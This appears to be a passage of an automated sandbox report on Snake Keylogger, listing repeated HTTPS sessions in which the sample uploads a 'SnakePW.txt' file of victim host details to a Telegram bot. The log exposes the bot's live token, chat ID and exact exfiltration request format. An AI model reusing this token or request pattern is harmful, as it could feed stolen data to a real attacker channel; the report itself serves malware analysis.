                            Date: Sun, 26 Jun 2022 07:34:25 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:34:25 UTC420INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 33 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 36 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":67030,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228865,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            249192.168.2.550161149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:34:25 UTC420OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da575714457e05
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:34:25 UTC420OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 34 34 35 37 65 30 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da575714457e05Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:34:26 UTC421INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:34:26 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:34:26 UTC421INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 33 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 36 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":67031,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228865,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            25192.168.2.549793149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:32:48 UTC42OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756da5e9696
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:32:48 UTC42OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 64 61 35 65 39 36 39 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756da5e9696Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:32:48 UTC43INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:32:48 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:32:48 UTC43INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 37 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 36 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66772,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228768,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            250192.168.2.550162149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:34:26 UTC422OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da575714837b7d
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:34:26 UTC422OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 34 38 33 37 62 37 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da575714837b7dContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:34:26 UTC423INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:34:26 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:34:26 UTC423INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 33 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 36 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":67032,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228866,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            251192.168.2.550163149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:34:26 UTC423OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da575714eec568
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:34:26 UTC424OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 34 65 65 63 35 36 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da575714eec568Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:34:27 UTC424INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:34:27 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:34:27 UTC425INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 33 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 36 37 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":67033,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228867,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            252192.168.2.550164149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:34:27 UTC425OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5757152338e1
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:34:27 UTC425OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 35 32 33 33 38 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5757152338e1Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:34:27 UTC426INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:34:27 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:34:27 UTC426INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 33 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 36 37 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":67034,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228867,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            253192.168.2.550165149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:34:27 UTC427OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5757156135bb
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:34:27 UTC427OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 35 36 31 33 35 62 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5757156135bbContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:34:27 UTC428INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:34:27 GMT
                            Content-Type: application/json
                            Content-Length: 509
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:34:27 UTC428INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 33 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 36 37 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":67036,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228867,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            254192.168.2.550166149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:34:28 UTC428OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5757159cd6bc
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:34:28 UTC429OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 35 39 63 64 36 62 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5757159cd6bcContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:34:28 UTC429INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:34:28 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:34:28 UTC430INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 33 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 36 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
